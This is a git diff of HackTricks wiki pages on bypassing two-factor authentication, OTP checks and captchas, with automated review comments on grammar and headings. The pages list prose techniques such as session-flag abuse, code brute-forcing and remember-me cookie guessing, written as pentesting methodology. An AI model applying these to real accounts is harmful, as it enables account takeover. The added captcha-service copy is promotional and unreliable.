**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -99,7 +99,7 @@ Entry_2:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -248,6 +248,7 @@ Launch some kind of **spider** inside the web. The goal of the spider is to **fi
|
||||||
* [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): Crawl (even by filling forms) and also find sensitive info using specific regexes.
|
* [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): Crawl (even by filling forms) and also find sensitive info using specific regexes.
|
||||||
* [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite is an advance multi-feature GUI web security Crawler/Spider designed for cyber security professionals.
|
* [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite is an advance multi-feature GUI web security Crawler/Spider designed for cyber security professionals.
|
||||||
* [**jsluice**](https://github.com/BishopFox/jsluice) (go): It's a Go package and [command-line tool](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice) for extracting URLs, paths, secrets, and other interesting data from JavaScript source code.
|
* [**jsluice**](https://github.com/BishopFox/jsluice) (go): It's a Go package and [command-line tool](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice) for extracting URLs, paths, secrets, and other interesting data from JavaScript source code.
|
||||||
|
* [**ParaForge**](https://github.com/Anof-cyber/ParaForge): ParaForge is a simple **Burp Suite extension** to **extract the paramters and endpoints** from the request to create custom wordlist for fuzzing and enumeration.
|
||||||
|
|
||||||
### Brute Force directories and files
|
### Brute Force directories and files
|
||||||
|
|
||||||
|
|
|
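Review bot: the added ParaForge bullet has a typo (`paramters` → `parameters`) and reads "create custom wordlist" where "create a custom wordlist" is needed; its sibling entries also tag the implementation (`(go)`), so marking this one as a Burp extension in the same position keeps the list consistent. Suggested line: `* [**ParaForge**](https://github.com/Anof-cyber/ParaForge) (Burp Suite extension): extracts the **parameters and endpoints** from requests to build a custom wordlist for fuzzing and enumeration.`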
@ -1,122 +1,121 @@
|
||||||
|
# 2FA/OTP Bypass
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
||||||
|
|
||||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## **Bypassing two-factor authentication**
|
||||||
|
|
||||||
# **Bypassing two-factor authentication**
|
### **Direct bypass**
|
||||||
|
|
||||||
## **Direct bypass**
|
|
||||||
|
|
||||||
To bypass 2FA, just **try to access the next endpoint directly** (you need to know the path of the next endpoint). If this doesn't work, try to change the **Referrer header** as if you came from the 2FA page.
|
To bypass 2FA, just **try to access the next endpoint directly** (you need to know the path of the next endpoint). If this doesn't work, try to change the **Referrer header** as if you came from the 2FA page.
|
||||||
|
|
||||||
## **Reusing token**
|
### **Reusing token**
|
||||||
|
|
||||||
Maybe you can reuse a previously used token inside the account to authenticate.
|
Maybe you can reuse a previously used token inside the account to authenticate.
|
||||||
|
|
||||||
## Sharing unused tokens
|
### Sharing unused tokens
|
||||||
|
|
||||||
Check if you can get the token from your account and try to use it to bypass the 2FA in a different account.
|
Check if you can get the token from your account and try to use it to bypass the 2FA in a different account.
|
||||||
|
|
||||||
## Leaked Token
|
### Leaked Token
|
||||||
|
|
||||||
Is the token leaked on a response from the web application?
|
Is the token leaked on a response from the web application?
|
||||||
|
|
||||||
## Session permission
|
### Email verification link
|
||||||
|
|
||||||
|
Try to use the **email verification link received when the account was created** to see if even if the 2FA was set you can still access your profile just with that link ([post](https://srahulceh.medium.com/behind-the-scenes-of-a-security-bug-the-perils-of-2fa-cookie-generation-496d9519771b)).
|
||||||
|
|
||||||
|
### Session permission
|
||||||
|
|
||||||
Using the same session start the flow using your account and the victim's account. When reaching the 2FA point on both accounts, complete the 2FA with your account but do not access the next part. Instead of that, try to access the next step with the victim's account flow. If the back-end only set a boolean inside your sessions saying that you have successfully passed the 2FA you will be able to bypass the 2FA of the victim.
|
Using the same session start the flow using your account and the victim's account. When reaching the 2FA point on both accounts, complete the 2FA with your account but do not access the next part. Instead of that, try to access the next step with the victim's account flow. If the back-end only set a boolean inside your sessions saying that you have successfully passed the 2FA you will be able to bypass the 2FA of the victim.
|
||||||
|
|
||||||
## **Password reset function**
|
### **Password reset function**
|
||||||
|
|
||||||
In almost all web applications the **password reset function automatically logs the user into the application** after the reset procedure is completed.\
|
In almost all web applications the **password reset function automatically logs the user into the application** after the reset procedure is completed.\
|
||||||
Check if a **mail **is sent with a **link **to **reset the password** and if you can **reuse** that **link **to reset the password as **many times as you want** (even if the victim changes his email address).
|
Check if a **mail** is sent with a **link** to **reset the password** and if you can **reuse** that **link** to reset the password as **many times as you want** (even if the victim changes his email address).
|
||||||
|
|
||||||
## OAuth
|
### OAuth
|
||||||
|
|
||||||
If you can compromise the account of the user in a trusted **OAuth** platform (Google, Facebook...)
|
If you can compromise the account of the user in a trusted **OAuth** platform (Google, Facebook...)
|
||||||
|
|
||||||
## Brute force
|
### Brute force
|
||||||
|
|
||||||
### Lack of Rate limit
|
#### Lack of Rate limit
|
||||||
|
|
||||||
Is there any limit on the number of codes that you can try, so you can just brute force it? Be careful with a possible "silent" rate limit, always try several codes and then the real one to confirm the vulnerability.
|
Is there any limit on the number of codes that you can try, so you can just brute force it? Be careful with a possible "silent" rate limit, always try several codes and then the real one to confirm the vulnerability.
|
||||||
|
|
||||||
### Flow rate limit but no rate limit
|
#### Flow rate limit but no rate limit
|
||||||
|
|
||||||
In this case, there is a flow rate limit (you have to brute force it very slowly: 1 thread and some sleep before 2 tries) but no rate limit. So with enough time, you can be able to find the valid code.
|
In this case, there is a flow rate limit (you have to brute force it very slowly: 1 thread and some sleep before 2 tries) but no rate limit. So with enough time, you can be able to find the valid code.
|
||||||
|
|
||||||
### Re-send code and reset the limit
|
#### Re-send code and reset the limit
|
||||||
|
|
||||||
There is a rate limit but when you "resend the code" the same code is sent and the rate limit is reset. Then, you can brute force the code while you resend it so the rate limit is never reached.
|
There is a rate limit but when you "resend the code" the same code is sent and the rate limit is reset. Then, you can brute force the code while you resend it so the rate limit is never reached.
|
||||||
|
|
||||||
### Client side rate limit bypass
|
#### Client side rate limit bypass
|
||||||
|
|
||||||
{% content-ref url="rate-limit-bypass.md" %}
|
{% content-ref url="rate-limit-bypass.md" %}
|
||||||
[rate-limit-bypass.md](rate-limit-bypass.md)
|
[rate-limit-bypass.md](rate-limit-bypass.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### Lack of rate limit in the user's account
|
#### Lack of rate limit in the user's account
|
||||||
|
|
||||||
Sometimes you can configure the 2FA for some actions inside your account (change mail, password...). However, even in cases where there is a rate limit when you tried to log in, there isn't any rate limit to protect actions inside the account.
|
Sometimes you can configure the 2FA for some actions inside your account (change mail, password...). However, even in cases where there is a rate limit when you tried to log in, there isn't any rate limit to protect actions inside the account.
|
||||||
|
|
||||||
### Lack of rate limit re-sending the code via SMS
|
#### Lack of rate limit re-sending the code via SMS
|
||||||
|
|
||||||
You won't be able to bypass the 2FA but you will be able to waste the company's money.
|
You won't be able to bypass the 2FA but you will be able to waste the company's money.
|
||||||
|
|
||||||
### Infinite OTP regeneration
|
#### Infinite OTP regeneration
|
||||||
|
|
||||||
If you can **generate a new OTP infinite times**, the** OTP is simple enough** (4 numbers), and you can try up to 4 or 5 tokens per generated OTP, you can just try the same 4 or 5 tokens every time and generate OTPs until it matches the ones you are using.
|
If you can **generate a new OTP infinite times**, the OTP is **simple enough** (4 numbers), and you can try up to 4 or 5 tokens per generated OTP, you can just try the same 4 or 5 tokens every time and generate OTPs until it matches the ones you are using.
|
||||||
|
|
||||||
## CSRF/Clickjacking
|
### CSRF/Clickjacking
|
||||||
|
|
||||||
Check if there is a Cross Site Request Forgery (CSRF) or a Clickjacking vulnerability to disable the 2FA.
|
Check if there is a Cross Site Request Forgery (CSRF) or a Clickjacking vulnerability to disable the 2FA.
|
||||||
|
|
||||||
## Remember me functionality
|
### Remember me functionality
|
||||||
|
|
||||||
### Guessable cookie
|
#### Guessable cookie
|
||||||
|
|
||||||
If the "remember me" functionality uses a new cookie with a guessable code, try to guess it.
|
If the "remember me" functionality uses a new cookie with a guessable code, try to guess it.
|
||||||
|
|
||||||
### IP address
|
#### IP address
|
||||||
|
|
||||||
If the "remember me" functionality is attached to your IP address, you can try to figure out the IP address of the victim and impersonate it using the **X-Forwarded-For** header.
|
If the "remember me" functionality is attached to your IP address, you can try to figure out the IP address of the victim and impersonate it using the **X-Forwarded-For** header.
|
||||||
|
|
||||||
## Older versions
|
### Older versions
|
||||||
|
|
||||||
### Subdomains
|
#### Subdomains
|
||||||
|
|
||||||
If you can find some "testing" subdomains with the login functionality, they could be using old versions that don't support 2FA (so it is directly bypassed) or those endpoints could support a vulnerable version of the 2FA.
|
If you can find some "testing" subdomains with the login functionality, they could be using old versions that don't support 2FA (so it is directly bypassed) or those endpoints could support a vulnerable version of the 2FA.
|
||||||
|
|
||||||
### APIs
|
#### APIs
|
||||||
|
|
||||||
If you find that the 2FA is using an API located under a /v\*/ directory (like "/v3/"), this probably means that there are older API endpoints that could be vulnerable to some kind of 2FA bypass.
|
If you find that the 2FA is using an API located under a /v\*/ directory (like "/v3/"), this probably means that there are older API endpoints that could be vulnerable to some kind of 2FA bypass.
|
||||||
|
|
||||||
## Previous sessions
|
### Previous sessions
|
||||||
|
|
||||||
When the 2FA is enabled, previous sessions created should be ended. This is because when a client has his account compromised he could want to protect it by activating the 2FA, but if the previous sessions aren't ended, this won't protect him.
|
When the 2FA is enabled, previous sessions created should be ended. This is because when a client has his account compromised he could want to protect it by activating the 2FA, but if the previous sessions aren't ended, this won't protect him.
|
||||||
|
|
||||||
## Improper access control to backup codes
|
### Improper access control to backup codes
|
||||||
|
|
||||||
Backup codes are generated immediately after 2FA is enabled and are available on a single request. After each subsequent call to the request, the codes can be regenerated or remain unchanged (static codes). If there are CORS misconfigurations/XSS vulnerabilities and other bugs that allow you to “pull” backup codes from the response request of the backup code endpoint, then the attacker could steal the codes and bypass 2FA if the username and password are known.
|
Backup codes are generated immediately after 2FA is enabled and are available on a single request. After each subsequent call to the request, the codes can be regenerated or remain unchanged (static codes). If there are CORS misconfigurations/XSS vulnerabilities and other bugs that allow you to “pull” backup codes from the response request of the backup code endpoint, then the attacker could steal the codes and bypass 2FA if the username and password are known.
|
||||||
|
|
||||||
## Information Disclosure
|
### Information Disclosure
|
||||||
|
|
||||||
If you notice some confidential information appear on the 2FA page that you didn't know previously (like the phone number), then this can be considered an information disclosure vulnerability.
|
If you notice some confidential information appear on the 2FA page that you didn't know previously (like the phone number), then this can be considered an information disclosure vulnerability.
|
||||||
|
|
||||||
## **Password-Reset == disable 2FA**
|
### **Password-Reset == disable 2FA**
|
||||||
|
|
||||||
1. Create an Account and Turn On 2FA.
|
1. Create an Account and Turn On 2FA.
|
||||||
2. Logout from that account.
|
2. Logout from that account.
|
||||||
|
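Review bot: the heading demotion in this hunk is right (the page title `# 2FA/OTP Bypass` should be the only H1, so `# Bypassing two-factor authentication` becomes `##` and its children `###`/`####`), but the subheadings under "Brute force" end up with inconsistent capitalization: "Lack of Rate limit" next to "Lack of rate limit in the user's account", and "Client side rate limit bypass" should be "Client-side". The heading "Flow rate limit but no rate limit" also reads as self-contradictory; its paragraph describes per-request throttling with no cap on total attempts, so something like "Throttling but no attempt limit" would say what is meant. Minor grammar in the visible context: "If the back-end only set a boolean inside your sessions" should be "sets", and in the new "Email verification link" section "to see if even if the 2FA was set you can still access" reads better as "to check whether you can still access your profile with that link even after 2FA was enabled".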
@ -125,27 +124,20 @@ If you notice some confidential information appear on the 2FA page that you didn
|
||||||
5. Now try to log in.
|
5. Now try to log in.
|
||||||
6. If you are not asked to enter a 2FA code, You can report.
|
6. If you are not asked to enter a 2FA code, You can report.
|
||||||
|
|
||||||
# References
|
## References
|
||||||
|
|
||||||
{% embed url="https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35" %}
|
{% embed url="https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35" %}
|
||||||
|
|
||||||
{% embed url="https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718" %}
|
{% embed url="https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718" %}
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
||||||
|
|
||||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
|
||||||
|
|
|
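Review bot: `# References` to `## References` matches the rest of the page, where only the title is an H1, so this is consistent. Step 6 in the visible context has a stray capital and a dangling verb: "If you are not asked to enter a 2FA code, You can report." should read "If you are not asked to enter a 2FA code, you can report it."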
@ -1,23 +1,18 @@
|
||||||
|
# Captcha Bypass
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
||||||
|
|
||||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## Captcha Bypass
|
||||||
# Captcha Bypass
|
|
||||||
|
|
||||||
To **automate** the **testing** of some functions of the server that allows user input it **could** be **needed** to **bypass** a **captcha** implementation. Therefore, try to test for these things:
|
To **automate** the **testing** of some functions of the server that allows user input it **could** be **needed** to **bypass** a **captcha** implementation. Therefore, try to test for these things:
|
||||||
|
|
||||||
|
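Review bot: the hunk turns the second "Captcha Bypass" heading into a second `# Captcha Bypass`, while the page title at the top of this hunk is already `# Captcha Bypass`; two H1s with the same text break the heading hierarchy that the other pages in this commit are being normalized to. Keep the body heading at `##` (matching `## Online Services to bypass captchas` later in the file) or drop it, since it repeats the title with no content of its own. The intro sentence in the visible context also needs a grammar pass: "some functions of the server that allows user input it could be needed to bypass a captcha" should read "some server functions that accept user input, it may be necessary to bypass the captcha".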
@ -33,21 +28,24 @@ To **automate** the **testing** of some functions of the server that allows user
|
||||||
* If the captcha consists of **read characters from an image**, check manually or with code **how many images** are being used and if only a **few images are being used, detect them by MD5.**
|
* If the captcha consists of **read characters from an image**, check manually or with code **how many images** are being used and if only a **few images are being used, detect them by MD5.**
|
||||||
* Use an **OCR** ([https://github.com/tesseract-ocr/tesseract](https://github.com/tesseract-ocr/tesseract)).
|
* Use an **OCR** ([https://github.com/tesseract-ocr/tesseract](https://github.com/tesseract-ocr/tesseract)).
|
||||||
|
|
||||||
|
## Online Services to bypass captchas
|
||||||
|
|
||||||
|
### [Capsolver](https://www.capsolver.com/)
|
||||||
|
|
||||||
|
Capsolver‘s automatic captcha solver offers the **most affordable and quick captcha-solving solution**. You may rapidly combine it with your program using its simple integration option to achieve the best results in a matter of seconds.
|
||||||
|
|
||||||
|
With a success rate of 99.15%, Capsolver can **answer more than 10M captchas every minute**. This implies that your automation or scrape will have a 99.99% uptime. You may buy a captcha package if you have a large budget.
|
||||||
|
|
||||||
|
At the lowest price on the market, you may receive a variety of solutions, including reCAPTCHA V2, reCAPTCHA V3, hCaptcha, hCaptcha Click, reCaptcha click, Funcaptcha Click, FunCaptcha, datadome captcha, aws captcha, picture-to-text, binance / coinmarketcap captcha, geetest v3 / v3, and more. With this service, **0.1s is the slowest speed ever measured**.
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
||||||
|
|
||||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
|
||||||
|
|
|
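Review bot: the added "Online Services to bypass captchas" section is vendor marketing copy rather than a technique, and it carries unverifiable figures ("success rate of 99.15%", "more than 10M captchas every minute", "0.1s is the slowest speed ever measured") plus a non sequitur (a solve rate does not imply "99.99% uptime"); either label it as sponsored content, the way the HackenProof banner is presented elsewhere in this commit, or cut it to a one-line mention of the service with its link. Two smaller issues in the same lines: "geetest v3 / v3" repeats the same version, so one of the two is probably meant to be a different one and should be confirmed before merging, and "Capsolver‘s" uses a left single quotation mark (U+2018) where an ASCII apostrophe belongs.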
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
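Review bot: the figure path is changed to `../../.gitbook/assets/image (1) (3).png`, so please confirm that asset is actually committed under `.gitbook/assets` with exactly that name (spaces and parentheses included), since the other figure hunks in this diff are repointed to the same file and a missing asset would blank the banner on every page at once. While editing this tag, `alt=""` leaves the sponsor banner with no text fallback; `alt="HackenProof"` would keep the attribution for text renderers and screen readers.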
@ -476,7 +476,7 @@ img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev http
|
||||||
|
|
||||||
Trick from [**here**](https://ctftime.org/writeup/29310).
|
Trick from [**here**](https://ctftime.org/writeup/29310).
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
